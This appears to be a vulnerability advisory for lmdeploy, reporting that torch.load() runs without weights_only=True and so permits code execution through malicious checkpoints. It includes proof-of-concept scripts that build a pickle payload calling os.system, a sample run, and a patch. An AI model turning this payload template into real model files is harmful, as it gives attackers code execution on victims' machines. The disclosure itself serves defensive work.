An insecure deserialization vulnerability exists in lmdeploy where torch.load() is called without the weights_only=True parameter when loading model checkpoint files. This allows an attacker to execute arbitrary code on the victim's machine when they load a malicious .bin or .pt model file.
CWE: CWE-502 - Deserialization of Untrusted Data
Several locations in lmdeploy use torch.load() without the recommended weights_only=True security parameter. PyTorch's torch.load() uses Python's pickle module internally, which can execute arbitrary code during deserialization.
1. lmdeploy/vl/model/utils.py (Line 22)
def load_weight_ckpt(ckpt: str) -> Dict[str, torch.Tensor]:
"""Load checkpoint."""
if ckpt.endswith('.safetensors'):
return load_file(ckpt) # Safe - uses safetensors
else:
return torch.load(ckpt) # ← VULNERABLE: no weights_only=True
2. lmdeploy/turbomind/deploy/loader.py (Line 122)
class PytorchLoader(BaseLoader):
def items(self):
params = defaultdict(dict)
for shard in self.shards:
misc = {}
tmp = torch.load(shard, map_location='cpu') # ← VULNERABLE
Additional vulnerable locations:
- lmdeploy/lite/apis/kv_qparams.py:129-130
- lmdeploy/lite/apis/smooth_quant.py:61
- lmdeploy/lite/apis/auto_awq.py:101
- lmdeploy/lite/apis/get_small_sharded_hf.py:41
The codebase already uses the secure pattern in one location:
# lmdeploy/pytorch/weight_loader/model_weight_loader.py:103
state = torch.load(file, weights_only=True, map_location='cpu') # ✓ Secure
This shows the fix is already known and can be applied consistently across the codebase.
Save this as create_malicious_checkpoint.py:
#!/usr/bin/env python3
"""
Creates a malicious PyTorch checkpoint that executes code when loaded.
"""
import pickle
import os
class MaliciousPayload:
"""Executes arbitrary code during pickle deserialization."""
def __init__(self, command):
self.command = command
def __reduce__(self):
# This is called during unpickling - returns (callable, args)
return (os.system, (self.command,))
def create_malicious_checkpoint(output_path, command):
"""Create a malicious checkpoint file."""
malicious_state_dict = {
'model.layer.weight': MaliciousPayload(command),
'config': {'hidden_size': 768}
}
with open(output_path, 'wb') as f:
pickle.dump(malicious_state_dict, f)
print(f"[+] Created malicious checkpoint: {output_path}")
if __name__ == "__main__":
os.makedirs("malicious_model", exist_ok=True)
create_malicious_checkpoint(
"malicious_model/pytorch_model.bin",
"echo '[PoC] Arbitrary code executed! - RCE confirmed'"
)
Save this as exploit.py:
#!/usr/bin/env python3
"""
Demonstrates the vulnerability by loading the malicious checkpoint.
This simulates what happens when lmdeploy loads an untrusted model.
"""
import pickle
def unsafe_load(path):
"""Simulates torch.load() without weights_only=True."""
# torch.load() uses pickle internally, so this is equivalent
with open(path, 'rb') as f:
return pickle.load(f)
if __name__ == "__main__":
print("[*] Loading malicious checkpoint...")
print("[*] This simulates: torch.load(ckpt) in lmdeploy")
print("-" * 50)
result = unsafe_load("malicious_model/pytorch_model.bin")
print("-" * 50)
print(f"[!] Checkpoint loaded. Keys: {list(result.keys())}")
print("[!] If you see the PoC message above, RCE is confirmed!")
# Create the malicious checkpoint
python create_malicious_checkpoint.py
# Exploit - triggers code execution
python exploit.py
[+] Created malicious checkpoint: malicious_model/pytorch_model.bin
[*] Loading malicious checkpoint...
[*] This simulates: torch.load(ckpt) in lmdeploy
--------------------------------------------------
[PoC] Arbitrary code executed! - RCE confirmed ← Code executed here!
--------------------------------------------------
[!] Checkpoint loaded. Keys: ['model.layer.weight', 'config']
[!] If you see the PoC message above, RCE is confirmed!
The [PoC] Arbitrary code executed! message proves that arbitrary shell commands run during deserialization.
.bin, .pt) from untrusted sourcespytorch_model.bin) containing a pickle payloadAdd weights_only=True to all torch.load() calls:
# lmdeploy/vl/model/utils.py:22
- return torch.load(ckpt)
+ return torch.load(ckpt, weights_only=True)
# lmdeploy/turbomind/deploy/loader.py:122
- tmp = torch.load(shard, map_location='cpu')
+ tmp = torch.load(shard, map_location='cpu', weights_only=True)
# Apply the same pattern to:
# - lmdeploy/lite/apis/kv_qparams.py:129-130
# - lmdeploy/lite/apis/smooth_quant.py:61
# - lmdeploy/lite/apis/auto_awq.py:101
# - lmdeploy/lite/apis/get_small_sharded_hf.py:41
Alternatively, consider migrating fully to SafeTensors format, which is already supported in the codebase and immune to this vulnerability class.
PyTorch torch.load() Documentation
"torch.load() uses pickle module implicitly, which is known to be insecure. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling. Never load data that could have come from an untrusted source."
| CVE | Description | CVSS |
|-----|-------------|------|
| CVE-2025-32434 | PyTorch torch.load() RCE vulnerability | 9.3 Critical |
| CVE-2024-5452 | PyTorch Lightning insecure deserialization | 8.8 High |
Thank you for your time reviewing this report. I'm happy to provide any additional information or help with testing the fix. Please let me know if you have any questions!
{
"severity": "HIGH",
"github_reviewed_at": "2025-12-26T17:34:08Z",
"cwe_ids": [
"CWE-502"
],
"nvd_published_at": "2025-12-26T22:15:52Z",
"github_reviewed": true
}